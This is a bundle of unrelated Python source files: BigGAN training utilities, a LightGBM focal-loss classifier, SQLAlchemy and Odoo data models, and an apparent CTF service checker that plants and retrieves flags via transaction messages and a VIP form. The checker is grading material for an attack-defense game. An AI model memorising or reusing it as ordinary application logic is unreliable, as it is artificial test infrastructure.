out_ims = torch.stack(ims, 1).view(-1, ims[0].shape[1], ims[0].shape[2],
ims[0].shape[3]).data.float().cpu()
# The path for the samples
image_filename = '%s/%s/%d/samples%d.jpg' % (samples_root, experiment_name,
folder_number, i)
torchvision.utils.save_image(out_ims, image_filename,
nrow=samples_per_class, normalize=True)
# Interp function; expects x0 and x1 to be of shape (shape0, 1, rest_of_shape..)
def interp(x0, x1, num_midpoints):
lerp = torch.linspace(0, 1.0, num_midpoints + 2, device='cuda').to(x0.dtype)
return (x0 * (1 - lerp.view(1, -1, 1))) + (x1 * lerp.view(1, -1, 1))
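# Worked example: with num_midpoints=2 the lerp weights are [0, 1/3, 2/3, 1],
# so interp stacks x0, two evenly spaced blends, and x1 along dim 1; e.g.
# endpoints 0 and 3 (broadcast to the expected shapes) yield 0, 1, 2, 3.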
# interp sheet function
# Supports full, class-wise and intra-class interpolation
def interp_sheet(G, num_per_sheet, num_midpoints, num_classes, parallel,
samples_root, experiment_name, folder_number, sheet_number=0,
fix_z=False, fix_y=False, device='cuda'):
# Prepare zs and ys
if fix_z: # If fix Z, only sample 1 z per row
zs = torch.randn(num_per_sheet, 1, G.dim_z, device=device)
zs = zs.repeat(1, num_midpoints + 2, 1).view(-1, G.dim_z)
else:
zs = interp(torch.randn(num_per_sheet, 1, G.dim_z, device=device),
torch.randn(num_per_sheet, 1, G.dim_z, device=device),
num_midpoints).view(-1, G.dim_z)
if fix_y: # If fix y, only sample 1 z per row
ys = sample_1hot(num_per_sheet, num_classes)
ys = G.shared(ys).view(num_per_sheet, 1, -1)
ys = ys.repeat(1, num_midpoints + 2, 1).view(num_per_sheet * (num_midpoints + 2), -1)
else:
ys = interp(G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
num_midpoints).view(num_per_sheet * (num_midpoints + 2), -1)
# Run the net--note that we've already passed y through G.shared.
if G.fp16:
zs = zs.half()
with torch.no_grad():
if parallel:
out_ims = nn.parallel.data_parallel(G, (zs, ys)).data.cpu()
else:
out_ims = G(zs, ys).data.cpu()
interp_style = '' + ('Z' if not fix_z else '') + ('Y' if not fix_y else '')
image_filename = '%s/%s/%d/interp%s%d.jpg' % (samples_root, experiment_name,
folder_number, interp_style,
sheet_number)
torchvision.utils.save_image(out_ims, image_filename,
nrow=num_midpoints + 2, normalize=True)
# Convenience debugging function to print out gradnorms and shape from each layer
# May need to rewrite this so we can actually see which parameter is which
def print_grad_norms(net):
gradsums = [[float(torch.norm(param.grad).item()),
float(torch.norm(param).item()), param.shape]
for param in net.parameters()]
order = np.argsort([item[0] for item in gradsums])
print(['%3.3e,%3.3e, %s' % (gradsums[item_index][0],
gradsums[item_index][1],
str(gradsums[item_index][2]))
for item_index in order])
# Get singular values to log. This will use the state dict to find them
# and substitute underscores for dots.
def get_SVs(net, prefix):
d = net.state_dict()
return {('%s_%s' % (prefix, key)).replace('.', '_'):
float(d[key].item())
for key in d if 'sv' in key}
# Name an experiment based on its config
def name_from_config(config):
name = '_'.join([
item for item in [
'Big%s' % config['which_train_fn'],
config['dataset'],
config['model'] if config['model'] != 'BigGAN' else None,
'seed%d' % config['seed'],
'Gch%d' % config['G_ch'],
'Dch%d' % config['D_ch'],
'Gd%d' % config['G_depth'] if config['G_depth'] > 1 else None,
'Dd%d' % config['D_depth'] if config['D_depth'] > 1 else None,
'bs%d' % config['batch_size'],
'Gfp16' if config['G_fp16'] else None,
'Dfp16' if config['D_fp16'] else None,
'nDs%d' % config['num_D_steps'] if config['num_D_steps'] > 1 else None,
'nDa%d' % config['num_D_accumulations'] if config['num_D_accumulations'] > 1 else None,
'nGa%d' % config['num_G_accumulations'] if config['num_G_accumulations'] > 1 else None,
'Glr%2.1e' % config['G_lr'],
'Dlr%2.1e' % config['D_lr'],
'GB%3.3f' % config['G_B1'] if config['G_B1'] != 0.0 else None,
'GBB%3.3f' % config['G_B2'] if config['G_B2'] != 0.999 else None,
'DB%3.3f' % config['D_B1'] if config['D_B1'] != 0.0 else None,
'DBB%3.3f' % config['D_B2'] if config['D_B2'] != 0.999 else None,
'Gnl%s' % config['G_nl'],
'Dnl%s' % config['D_nl'],
'Ginit%s' % config['G_init'],
'Dinit%s' % config['D_init'],
'G%s' % config['G_param'] if config['G_param'] != 'SN' else None,
'D%s' % config['D_param'] if config['D_param'] != 'SN' else None,
'Gattn%s' % config['G_attn'] if config['G_attn'] != '0' else None,
'Dattn%s' % config['D_attn'] if config['D_attn'] != '0' else None,
'Gortho%2.1e' % config['G_ortho'] if config['G_ortho'] > 0.0 else None,
'Dortho%2.1e' % config['D_ortho'] if config['D_ortho'] > 0.0 else None,
config['norm_style'] if config['norm_style'] != 'bn' else None,
'cr' if config['cross_replica'] else None,
'Gshared' if config['G_shared'] else None,
'hier' if config['hier'] else None,
'ema' if config['ema'] else None,
config['name_suffix'] if config['name_suffix'] else None,
]
if item is not None])
# dogball
if config['hashname']:
return hashname(name)
else:
return name
# A simple function to produce a unique experiment name from the animal hashes.
# def hashname(name):
# h = hash(name)
# a = h % len(animal_hash.a)
# h = h // len(animal_hash.a)
# b = h % len(animal_hash.b)
# h = h // len(animal_hash.c)
# c = h % len(animal_hash.c)
# return animal_hash.a[a] + animal_hash.b[b] + animal_hash.c[c]
# Get GPU memory, -i is the index
def query_gpu(indices):
os.system('nvidia-smi -i 0 --query-gpu=memory.free --format=csv')
# Convenience function to count the number of parameters in a module
def count_parameters(module):
print('Number of parameters: {}'.format(
sum([p.data.nelement() for p in module.parameters()])))
# Convenience function to sample an index, not actually a 1-hot
def sample_1hot(batch_size, num_classes, device='cuda'):
return torch.randint(low=0, high=num_classes, size=(batch_size,),
device=device, dtype=torch.int64, requires_grad=False)
# A highly simplified convenience class for sampling from distributions
# One could also use PyTorch's inbuilt distributions package.
# Note that this class requires initialization to proceed as
# x = Distribution(torch.randn(size))
# x.init_distribution(dist_type, **dist_kwargs)
# x = x.to(device,dtype)
# This is partially based on https://discuss.pytorch.org/t/subclassing-torch-tensor/23754/2
class Distribution(torch.Tensor):
# Init the params of the distribution
def init_distribution(self, dist_type, **kwargs):
self.dist_type = dist_type
self.dist_kwargs = kwargs
if self.dist_type == 'normal':
self.mean, self.var = kwargs['mean'], kwargs['var']
elif self.dist_type == 'categorical':
self.num_categories = kwargs['num_categories']
def sample_(self):
if self.dist_type == 'normal':
self.normal_(self.mean, self.var)
elif self.dist_type == 'categorical':
self.random_(0, self.num_categories)
# return self.variable
# Silly hack: overwrite the to() method to wrap the new object
# in a distribution as well
def to(self, *args, **kwargs):
new_obj = Distribution(self)
new_obj.init_distribution(self.dist_type, **self.dist_kwargs)
new_obj.data = super().to(*args, **kwargs)
return new_obj
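# Minimal CPU sketch of the initialization pattern described above:
if __name__ == '__main__':
    _z = Distribution(torch.randn(4, 8))
    _z.init_distribution('normal', mean=0, var=1.0)
    _z = _z.to('cpu', torch.float32)  # to() re-wraps the result as a Distribution
    _z.sample_()                      # refills the tensor in place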
# Convenience function to prepare a z and y vector
def prepare_z_y(G_batch_size, dim_z, nclasses, device='cuda',
fp16=False, z_var=1.0):
z_ = Distribution(torch.randn(G_batch_size, dim_z, requires_grad=False))
z_.init_distribution('normal', mean=0, var=z_var)
z_ = z_.to(device, torch.float16 if fp16 else torch.float32)
if fp16:
z_ = z_.half()
y_ = Distribution(torch.zeros(G_batch_size, requires_grad=False))
y_.init_distribution('categorical', num_categories=nclasses)
y_ = y_.to(device, torch.int64)
return z_, y_
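# Sketch: CPU noise/label sources for a hypothetical 10-class, 120-dim-z model.
if __name__ == '__main__':
    _z, _y = prepare_z_y(G_batch_size=4, dim_z=120, nclasses=10, device='cpu')
    _z.sample_()
    _y.sample_()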
def initiate_standing_stats(net):
for module in net.modules():
if hasattr(module, 'accumulate_standing'):
module.reset_stats()
module.accumulate_standing = True
def accumulate_standing_stats(net, z, y, nclasses, num_accumulations=16):
initiate_standing_stats(net)
net.train()
for i in range(num_accumulations):
with torch.no_grad():
z.normal_()
y.random_(0, nclasses)
x = net(z, net.shared(y)) # No need to parallelize here unless using syncbn
# Set to eval mode
net.eval()
# This version of Adam keeps an fp32 copy of the parameters and
# does all of the parameter updates in fp32, while still doing the
# forwards and backwards passes using fp16 (i.e. fp16 copies of the
# parameters and fp16 activations).
#
# Note that this calls .float().cuda() on the params.
import math
from torch.optim.optimizer import Optimizer
class Adam16(Optimizer):
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay)
params = list(params)
super(Adam16, self).__init__(params, defaults)
# Safety modification to make sure we floatify our state
def load_state_dict(self, state_dict):
super(Adam16, self).load_state_dict(state_dict)
for group in self.param_groups:
for p in group['params']:
self.state[p]['exp_avg'] = self.state[p]['exp_avg'].float()
self.state[p]['exp_avg_sq'] = self.state[p]['exp_avg_sq'].float()
self.state[p]['fp32_p'] = self.state[p]['fp32_p'].float()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = grad.new().resize_as_(grad).zero_()
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()
# Fp32 copy of the weights
state['fp32_p'] = p.data.float()
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], state['fp32_p'])
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
state['fp32_p'].addcdiv_(-step_size, exp_avg, denom)
p.data = state['fp32_p'].half()
return loss
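# Usage sketch, assuming a CUDA device and the legacy PyTorch arithmetic API
# that step() above was written against: the module stays fp16 for the
# forward/backward pass while the update itself runs on the fp32 copies.
if __name__ == '__main__' and torch.cuda.is_available():
    _net = nn.Linear(8, 2).half().cuda()
    _opt = Adam16(_net.parameters(), lr=1e-3)
    _opt.zero_grad()
    _net(torch.randn(4, 8).half().cuda()).sum().backward()
    _opt.step()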
|
[
"l316652494@gmail.com"
] |
l316652494@gmail.com
|
4ba4638364b0e7648d4f4abc2d5e18a29c56e940
|
b487c6fe5ee7006ba986ed468198e3681088bd41
|
/Models/Working_Hours.py
|
861fcaf056bdd313dcdef09d090a9dd6be8abcee
|
[] |
no_license
|
jimist/yelp_crawler
|
cc9afbe08acc8e2c8b03b7c3c0d6a1ce49b3331c
|
4146bb6d1fa61d2e050bbf9494fa4cc09a2011a1
|
refs/heads/master
| 2022-12-11T07:25:12.853150
| 2019-05-09T19:04:23
| 2019-05-09T19:04:23
| 155,228,908
| 0
| 0
| null | 2022-07-06T20:00:46
| 2018-10-29T14:47:29
|
Python
|
UTF-8
|
Python
| false
| false
| 595
|
py
|
from sqlalchemy import (
Column,
ForeignKey,
Numeric,
Date,
JSON,
VARCHAR,
BOOLEAN,
)
from sqlalchemy.orm import relationship
from sqlalchemy.dialects.mysql import TINYINT, MEDIUMINT, CHAR
from Models.Model import Model
class Working_Hours(Model):
__tablename__ = 'working_hours'
    biz_id = Column(CHAR(22), primary_key=True)
monday = Column(VARCHAR(40))
sunday = Column(VARCHAR(40))
tuesday = Column(VARCHAR(40))
wednesday = Column(VARCHAR(40))
thursday = Column(VARCHAR(40))
friday = Column(VARCHAR(40))
saturday = Column(VARCHAR(40))
|
[
"alirezaimn@yahoo.com"
] |
alirezaimn@yahoo.com
|
6e1ba496f5643843456002b2c52d9e8df006f364
|
f83c4ec82a4e02e599198372cb7987629665319c
|
/classifier/run_lgbm_focalloss.py
|
c0220813c96455c66ca501b0d650df662112b9ea
|
[] |
no_license
|
lxgend/Classification_Toolbox
|
32aa2e90d0f0a85e1c9487e9b167f1014ac4e743
|
7da4268f5b39865f8b12529d3e8589e752a2df79
|
refs/heads/master
| 2023-02-08T21:13:18.225932
| 2020-12-17T09:36:20
| 2020-12-17T09:36:20
| 259,933,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,178
|
py
|
# coding=utf-8
import joblib
import lightgbm as lgb
import numpy as np
from scipy.misc import derivative
from sklearn.metrics import classification_report
from classifier.nets.wv import MODEL_FILE
from data_processor.data2example import clf_data_processors
from data_processor.example2dataset_vec import load_and_cache_examples_df
from parm import *
def focal_loss_lgb_sk(y_true, y_pred, alpha, gamma, num_class):
"""
    Focal loss objective for LightGBM's sklearn API:
        objective(y_true, y_pred) -> grad, hess

    Parameters:
    -----------
    alpha, gamma: float
        Focal loss parameters.
    y_true: array-like of shape = [n_samples]
        The target values.
    y_pred: array-like of shape = [n_samples] or shape = [n_samples * n_classes] (for multi-class task)
        The predicted values.
"""
a, g = alpha, gamma
y_true = np.eye(num_class)[y_true.astype('int')]
y_pred = y_pred.reshape(-1, num_class)
def fl(x, t):
p = 1 / (1 + np.exp(-x))
return -(a * t + (1 - a) * (1 - t)) * ((1 - (t * p + (1 - t) * (1 - p))) ** g) * (
t * np.log(p) + (1 - t) * np.log(1 - p))
partial_fl = lambda x: fl(x, y_true)
    # numerically differentiate the focal loss to get gradient and hessian
grad = derivative(partial_fl, y_pred, n=1, dx=1e-6)
hess = derivative(partial_fl, y_pred, n=2, dx=1e-6)
# return grad.flatten('F'), hess.flatten('F')
return grad, hess
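# For reference, the per-example focal loss implemented by fl() above is
#     FL(x, t) = -(a*t + (1-a)*(1-t)) * (1 - p_t)**g * log(p_t)
# with p = sigmoid(x) and p_t = t*p + (1-t)*(1-p): gamma g down-weights easy,
# well-classified examples, and alpha a re-balances positive/negative classes.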
def focal_loss_lgb_eval_error_sk(y_true, y_pred, alpha, gamma, num_class):
"""
    Adaptation of the focal loss for LightGBM, used as an evaluation loss
"""
a, g = alpha, gamma
y_true = np.eye(num_class)[y_true.astype('int')]
y_pred = y_pred.reshape(-1, num_class, order='F')
p = 1 / (1 + np.exp(-y_pred))
loss = -(a * y_true + (1 - a) * (1 - y_true)) * ((1 - (y_true * p + (1 - y_true) * (1 - p))) ** g) * (
y_true * np.log(p) + (1 - y_true) * np.log(1 - p))
return 'focal_loss', np.mean(loss), False
def train(x_train, y_train):
num_class =15
focal_loss = lambda y_true, y_pred: focal_loss_lgb_sk(y_true, y_pred, 0.25, 2., num_class)
eval_error = lambda x, y: focal_loss_lgb_eval_error_sk(x, y, 0.25, 2., num_class)
params = {
'boosting_type': 'gbdt',
'max_depth': 6,
'num_leaves': 60,
'n_estimators': 200,
'objective': focal_loss,
# 'objective': 'multiclass',
'max_bin': 150,
'reg_alpha': 0.1,
'reg_lambda': 0.2,
# 'class_weight':weight
'n_jobs': 8,
'learning_rate': 0.1,
#'num_class':15
# 'silent': False
}
model = lgb.LGBMClassifier(**params)
# model.fit(x_train, y_train,
# eval_set=[(x_dev, y_dev)],
# eval_metric=eval_error)
model.fit(x_train, y_train)
# from sklearn.model_selection import GridSearchCV
# lg = lgb.LGBMClassifier(silent=False, verbose=-1)
    # # scoring function
# mll_scorer = make_scorer(multiclass_logloss, greater_is_better=False, needs_proba=True)
    # # max_depth: maximum tree depth; lower it if the model overfits
    # # num_leaves: should be <= 2^(max_depth); larger values cause overfitting
# # min_data_in_leaf
# param_dist = {"max_depth": [10, 25, 50, 75],
# "learning_rate": [0.01, 0.05, 0.1],
# "num_leaves": [300, 500, 900, 1200],
# "n_estimators": [150, 200, 250],
# }
#
# parameters = {
# 'max_depth': [15, 20, 25, 30, 35],
# 'learning_rate': [0.01, 0.02, 0.05, 0.1, 0.15],
# 'feature_fraction': [0.6, 0.7, 0.8, 0.9, 0.95],
# 'bagging_fraction': [0.6, 0.7, 0.8, 0.9, 0.95],
# 'bagging_freq': [2, 4, 5, 6, 8],
# 'lambda_l1': [0, 0.1, 0.4, 0.5, 0.6],
# 'lambda_l2': [0, 10, 15, 35, 40],
# 'cat_smooth': [1, 10, 15, 20, 35]
# }
#
with open('model_lgbm.pkl', mode='wb') as f:
joblib.dump(model, f)
def evaluate(x_dev, y_dev, model):
    # run model prediction on the dev set
y_pred = model.predict(x_dev, num_iteration=model.best_iteration_)
    # inspect per-class precision and recall
print(classification_report(y_dev, y_pred))
def main(args):
# data init
clf_data_processor = clf_data_processors[args.task_name](args.data_dir)
args.id2label = clf_data_processor.get_labels()
args.label2id = {label: i for i, label in enumerate(args.id2label)}
num_labels = len(args.id2label)
print('num_labels %d' % (num_labels))
print('model %s' % args.model_type)
if args.model_type == 'fasttext_selftrain':
import fasttext
args.model = fasttext.load_model(os.path.join(PATH_MD_FT, 'model_ft_selftrain.pkl'))
args.vec_dim = 200
else:
args.model_path, args.vec_dim = MODEL_FILE[args.model_type]
args.word2id, args.wv_model = load_model(args.model_path)
if args.do_train:
x_train, y_train = load_and_cache_examples_df(args, clf_data_processor, data_type='train')
# print(len(x_train))
# print(len(x_train[0]))
# print(y_train.shape)
print('train_dataset %d' % len(y_train))
# x_dev, y_dev = load_and_cache_examples_df(args, clf_data_processor, data_type='dev')
# train
train(x_train, y_train)
if args.do_eval:
print('evaluate')
x_dev, y_dev = load_and_cache_examples_df(args, clf_data_processor, data_type='dev')
print('dev_dataset %d' % len(y_dev))
with open('model_lgbm.pkl', mode='rb') as f:
model = joblib.load(f)
        evaluate(x_dev, y_dev, model)
class Args(object):
def __init__(self):
self.task_name = 'tnews_vec'
self.data_dir = PATH_DATA_TNEWS_PRE
# self.output_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'finetuned')
self.overwrite_cache = 1
self.max_seq_length = 42
# self.model_type = 'sg_tx'
self.model_type = 'fasttext_selftrain'
self.local_rank = -1
self.use_cpu = 0
self.do_train = 1
self.do_eval = 0
self.do_test = 0
if __name__ == '__main__':
# args = get_argparse().parse_args()
import time
a = time.time()
args = Args()
# main2(args)
main(args)
print(time.time() - a)
|
[
"lx3103@gmail.com"
] |
lx3103@gmail.com
|
a5fed35d5376b69927501652f565200ad51ad79b
|
ba9fa9990fae4a8e2a51a87fbc6e87675788e458
|
/merc/checker/checker.py
|
b5427b646675bb3bff04a9762d835d992f3d1956
|
[] |
no_license
|
n57uctf/yetictf-2021
|
34ef0c90c3e4a73b3a70996119c2069e7618063f
|
6def7043b0c40076aa86d86bfde533de2742e290
|
refs/heads/main
| 2023-04-10T23:51:40.890494
| 2021-04-21T04:17:29
| 2021-04-21T04:17:29
| 359,523,625
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,947
|
py
|
#!/usr/bin/env python3
import sys
import requests
import re
import math
from bs4 import BeautifulSoup
from merclib import *
def check(host):
chk = CheckMachine(host)
login = rnd_username()
passwd = rnd_password()
chk.register_user(login,passwd)
sess = chk.login_user(login,passwd)
ctype = chk.currency_type(sess)
chk.mine_one(sess, ctype)
cquit(Status.OK, "OK",f'{login}:{passwd}')
def put_flag1(host, flag):
chk = CheckMachine(host)
login = rnd_username()
passwd = rnd_password()
chk.register_user(login,passwd)
sess = chk.login_user(login,passwd)
ctype = chk.currency_type(sess)
chk.mine_one(sess,ctype)
req = sess.post(f'{chk.url}/management/transactions', data = {"type": ctype,"amount": "0.01","recv_login": "tellers2006","message": flag})
check_response(req, 'Could not send currency')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('td', text = re.compile(flag))
if not table:
cquit(Status.MUMBLE, 'Couldn\'t send message')
else:
cquit(Status.OK, f"{login}",f'{login}:{passwd}')
def get_flag1(host, flag, flag_id):
chk = CheckMachine(host)
login, passwd = flag_id.strip().split(":")
sess = chk.login_user(login,passwd)
req = sess.get(f'{chk.url}/management/transactions')
check_response(req, 'Could not get transaction messages')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('td', text = re.compile(flag))
if not table:
cquit(Status.CORRUPT, 'Couldn\'t find flag in transaction message')
else:
cquit(Status.OK, 'OK')
def put_flag2(host, flag):
chk = CheckMachine(host)
login = rnd_username()
passwd = rnd_password()
amount = 1
curr_amount = 0
result = 0
chk.register_user(login,passwd)
sess = chk.login_user(login,passwd)
#ctype = chk.currency_type(sess)
ctype = 'coins'
    while result != 1:
result = chk.mine(sess,amount,curr_amount,ctype)
req = sess.post(f'{chk.url}/casinoe/VIP_page', data = {"email": login, "message": flag})
check_response(req, 'Could not send application')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('h4', text = re.compile(flag))
if not table:
cquit(Status.MUMBLE, 'Couldn\'t send message')
else:
cquit(Status.OK, f"{login}", f'{login}:{passwd}')
def get_flag2(host, flag, flag_id):
chk = CheckMachine(host)
login, passwd = flag_id.strip().split(":")
sess = chk.login_user(login,passwd)
req = sess.get(f'{chk.url}/casinoe/VIP_page')
check_response(req, 'Could not get application text')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('h4', text = re.compile(flag))
if not table:
cquit(Status.CORRUPT, 'Couldn\'t find flag in application message')
else:
cquit(Status.OK, 'OK')
if __name__ == '__main__':
action, *args = sys.argv[1:]
try:
if action == 'check':
host, = args
check(host)
elif action == 'put':
host, flag_id, flag, vuln_number = args
if vuln_number == '1':
put_flag1(host, flag)
else:
put_flag2(host, flag)
elif action == 'get':
host, flag_id, flag, vuln_number = args
if vuln_number == '1':
get_flag1(host, flag, flag_id)
else:
get_flag2(host, flag, flag_id)
else:
cquit(Status.ERROR, 'System error', 'Unknown action: ' + action)
cquit(Status.ERROR)
except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
cquit(Status.DOWN, 'Connection error')
except SystemError as e:
raise
except Exception as e:
cquit(Status.ERROR, 'System error', str(e))
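# Example checksystem invocations (host and flag values are hypothetical):
#   ./checker.py check 10.60.1.2
#   ./checker.py put 10.60.1.2 '' 'YETI{example_flag}' 1
#   ./checker.py get 10.60.1.2 'login:passwd' 'YETI{example_flag}' 2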
|
[
"rudkovskiyalex@gmail.com"
] |
rudkovskiyalex@gmail.com
|
e98867a3a197ebb29a8f23339ac78c503871d5d3
|
b4dfb1830d6ce53bc131b3fbc8fbc54c85c017f1
|
/vehicle/models/vehi_assessment.py
|
84c0a53e6d70b731bcf5743254894be9f8565745
|
[] |
no_license
|
faizasaeed97/sales-module
|
843d41ded4d4cafc3e69618e2c86407be548ee9c
|
80c60daef01665651a25cfbd3117a354a2764068
|
refs/heads/master
| 2023-02-09T00:41:26.611256
| 2020-11-24T09:00:20
| 2020-11-24T09:00:20
| 325,536,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,695
|
py
|
from odoo import api, fields, models, _, tools
from odoo.osv import expression
import base64
from odoo import modules
from odoo.exceptions import AccessError, UserError, ValidationError
from PIL import Image
class vehicel_assessment(models.Model):
_name = 'vehicle.assessment'
selection_body = [
('accident', 'accident'),
('non-accident', 'non-accident'),
]
selection_engine = [
('complete', 'complete'),
('un-complete', 'uncomplete'),
('leakage', 'leakage'),
('non-leakage', 'non-leakage'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_brakes = [
('smooth', 'smooth'),
('morethan50', 'more than 50%'),
('lessthan50', 'less than 50%'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_suspension = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_interior = [
('ok', 'ok'),
('not-ok', 'not-ok'),
('working', 'working'),
('not-working', 'not-working'),
]
selection_ac = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('ok', 'ok'),
('not-ok', 'not-ok'),
('working', 'working'),
('not-working', 'not-working'),
]
selection_electrical = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_exterior = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_tyre = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_drive = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
name = fields.Char('Name')
vehicle = fields.Many2one('vehicle')
Radiator_Core_Support = fields.Selection(selection_body,string="Radiator")
Radiator_Core_Support_img= fields.Selection(selection_body,string="Radiator")
Right_Strut_Tower_Apron= fields.Selection(selection_body,string="Radiator")
Right_Strut_Tower_Apron_img= fields.Selection(selection_body,string="Radiator")
Left_Strut_Tower_Apron= fields.Selection(selection_body,string="Radiator")
Left_Strut_Tower_Apron_img= fields.Selection(selection_body,string="Radiator")
Right_Front_Rail= fields.Selection(selection_body,string="Radiator")
Right_Front_Rail_img= fields.Selection(selection_body,string="Radiator")
Left_Front_Rail= fields.Selection(selection_body,string="Radiator")
Left_Front_Rail_img= fields.Selection(selection_body,string="Radiator")
Cowl_Panel_Firewall= fields.Selection(selection_body,string="Radiator")
Cowl_Panel_Firewall_img= fields.Selection(selection_body,string="Radiator")
RightA_Pillar= fields.Selection(selection_body,string="Radiator")
RightA_Pillar_img= fields.Selection(selection_body,string="Radiator")
LeftA_Pillar= fields.Selection(selection_body,string="Radiator")
LeftA_Pillar_img= fields.Selection(selection_body,string="Radiator")
RightB_Pillar= fields.Selection(selection_body,string="Radiator")
RightB_Pillar_img= fields.Selection(selection_body,string="Radiator")
LeftB_Pillar= fields.Selection(selection_body,string="Radiator")
LeftB_Pillar_img= fields.Selection(selection_body,string="Radiator")
RightC_Pillar= fields.Selection(selection_body,string="Radiator")
RightC_Pillar_img= fields.Selection(selection_body,string="Radiator")
LeftC_Pillar= fields.Selection(selection_body,string="Radiator")
LeftC_Pillar_img= fields.Selection(selection_body,string="Radiator")
Boot_Floor= fields.Selection(selection_body,string="Radiator")
Boot_Floor_img= fields.Selection(selection_body,string="Radiator")
Boot_Lock_Pillar= fields.Selection(selection_body,string="Radiator")
Boot_Lock_Pillar_img= fields.Selection(selection_body,string="Radiator")
Front_Sub_Frame= fields.Selection(selection_body,string="Radiator")
Front_Sub_Frame_img= fields.Selection(selection_body,string="Radiator")
Rear_Sub_Frame= fields.Selection(selection_body,string="Radiator")
Rear_Sub_Frame_img= fields.Selection(selection_body,string="Radiator")
# ---------------------------------------------------------------
Engine_Oil_Level= fields.Selection(selection_engine,string="Radiator")
Engine_Oil_Level_img= fields.Selection(selection_engine,string="Radiator")
Engine_Oil_Leakage= fields.Selection(selection_engine,string="Radiator")
Engine_Oil_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Transmission_Oil_Leakage= fields.Selection(selection_engine,string="Radiator")
Transmission_Oil_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Level= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Level_img= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Leakage= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Level= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Level_img= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Leakage= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Coolant_Leakage= fields.Selection(selection_engine,string="Radiator")
Coolant_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Catalytic_Convertor= fields.Selection(selection_engine,string="Radiator")
Catalytic_Convertor_img= fields.Selection(selection_engine,string="Radiator")
Exhaust_Sound= fields.Selection(selection_engine,string="Radiator")
Exhaust_Sound_img= fields.Selection(selection_engine,string="Radiator")
Exhaust_Joints= fields.Selection(selection_engine,string="Radiator")
Exhaust_Joints_img= fields.Selection(selection_engine,string="Radiator")
Radiator= fields.Selection(selection_engine,string="Radiator")
Radiator_img= fields.Selection(selection_engine,string="Radiator")
Suction_Fan= fields.Selection(selection_engine,string="Radiator")
Suction_Fan_img= fields.Selection(selection_engine,string="Radiator")
Starter_Operation= fields.Selection(selection_engine,string="Radiator")
Starter_Operation_img= fields.Selection(selection_engine,string="Radiator")
# brakes===============================================================
Front_Right_Disc= fields.Selection(selection_brakes,string="Radiator")
Front_Right_Disc_img= fields.Selection(selection_brakes,string="Radiator")
Front_Left_Disc= fields.Selection(selection_brakes,string="Radiator")
Front_Left_Disc_img= fields.Selection(selection_brakes,string="Radiator")
Front_Right_Brake_Pad= fields.Selection(selection_brakes,string="Radiator")
Front_Right_Brake_Pad_img= fields.Selection(selection_brakes,string="Radiator")
